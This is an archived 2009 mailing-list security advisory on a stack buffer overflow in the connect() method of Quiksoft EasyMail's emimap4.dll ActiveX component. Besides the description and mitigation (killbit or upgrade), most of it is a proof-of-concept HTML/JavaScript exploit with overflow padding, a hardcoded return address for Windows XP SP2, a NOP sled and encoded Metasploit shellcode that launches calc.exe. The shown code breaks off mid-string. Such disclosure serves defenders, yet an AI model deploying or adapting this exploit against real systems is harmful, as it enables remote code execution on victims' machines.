[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Quiksoft EasyMail imap connect() ActiveX stack overflow exploit



Security advisory: Quiksoft EasyMail imap connect() ActiveX stack overflow exploit


Description: Remotely exploitable buffer overflow in ActiveX component
Quiksoft EasyMail allows for the arbitrary code execution in the
user context.

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),

Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org/easymail-advisory-09-2009.txt


Quote from quiksoft.com: "The EasyMail Products are relied upon by over thousands of international corporations, federal, state and local organizations, and individual developers. Quiksoft has established the EasyMail products as "the professional, reliable, and easy to use choice for e-mail development". More information about
the product can be found online at http://www.quiksoft.com.


The software Quiksoft EasyMail ships emimap4.dll, an ActiveX component to facilitate the development of IMAP4-aware applications. The connect() function of this component is prone to a classic buffer overflow vulnerability when a particularly long argument is passed and the application attempts to copy that data into a finite buffer. This allows for the execution of arbitrary code in the
user context.


Either set the killbit for the relevant ActiveX component (clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D) or install the latest version of Quiksoft EasyMail which is not considered vulnerable.


Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis Provencher for drawing my attention on Quiksoft EasyMail. Shellcode below is rather harmless and
executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version


 <title>Quiksoft EasyMail imap connect() stack overflow</title>
 <script language="JavaScript" defer>
   function Check() {
var buf = 'A';
    while (buf.length <= 440) buf = buf + 'A';

// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +

       var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English
var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

       var m = buf + eip + nop + shellcode1 + nop;
<body onload="JavaScript: return Check();">
   <object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
    Failed to instantiate object.